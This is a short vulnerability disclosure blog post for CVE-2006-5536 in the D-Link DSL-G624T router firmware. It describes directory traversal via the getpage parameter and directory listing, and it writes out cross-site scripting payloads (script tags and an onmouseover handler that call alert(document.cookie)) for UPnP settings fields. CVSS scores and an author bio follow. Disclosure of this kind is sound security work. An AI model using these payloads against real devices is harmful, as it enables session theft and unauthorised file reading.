CVE-2006-5536: D-Link DSL-G624T several vulnerabilities

Jose Ramon Palanco Jose Ramon Palanco Follow Oct 26, 2006 · 1 min read
CVE-2006-5536: D-Link DSL-G624T several vulnerabilities
Share this

Directory traversal vulnerability in cgi-bin/webcm in D-Link DSL-G624T firmware 3.00B01T01.YA-C.20060616 allows remote attackers to read arbitrary files via a .. (dot dot) in the getpage parameter.


José Ramón Palanco:



Directory transversal




Cross Site Scripting

Affected url: http://router/cgi-bin/webcm

Method Variable Value
POST upnp%3Asettings%2Fstate >”><ScRiPt%20%0a%0d>alert(document.cookie)%3B</ScRiPt>
POST upnp%3Asettings%2Fconnection >”><ScRiPt%20%0a%0d>alert(document.cookie)%3B</ScRiPt>
POST upnp%3Asettings%2Fconnection “+onmouseover=”alert(document.cookie)

Directory listing

Affected: /cgi-bin directory

Products and Versions

  • Vendor: D-LINK
  • Product: DSL-G624T
  • Version: V3.00B01T01.YA-C.20060616

CPE v2.3


CVSS Scores & Vulnerability Types

Name Value
CVSS Score 5.0
Confidentiality Impact Partial (There is considerable informational disclosure.)
Integrity Impact None (There is no impact to the integrity of the system)
Availability Impact None (There is no impact to the availability of the system.)
Access Complexity Low (Specialized access conditions or extenuating circumstances do not exist. Very little knowledge or skill is required to exploit. )
Authentication Not required (Authentication is not required to exploit the vulnerability.)
Gained Access None
Vulnerability Type(s) Directory traversal
CWE ID CWE id is not defined for this vulnerability


Jose Ramon Palanco
Written by Jose Ramon Palanco Follow
Jose Ramón Palanco currently holds CEO/CTO positions at EpicBounties since June 2021. In the past he founded Dinoflux at 2014, a Threat Intelligence startup acquired by Telefonica, currently he works for 11paths since 2018. He worked also for Ericsson at R&D department and Optenet (Allot). He studied Telecommunications Engineering at the University of Alcala de Henares and Master of IT Governance at the University of Deusto. He has been a speaker at OWASP, ROOTEDCON, ROOTCON, MALCON, and FAQin... He has published several CVE and different open source tools for cybersecurity like nmap-scada, ProtocolDetector, escan, pma, EKanalyzer, SCADA IDS, ...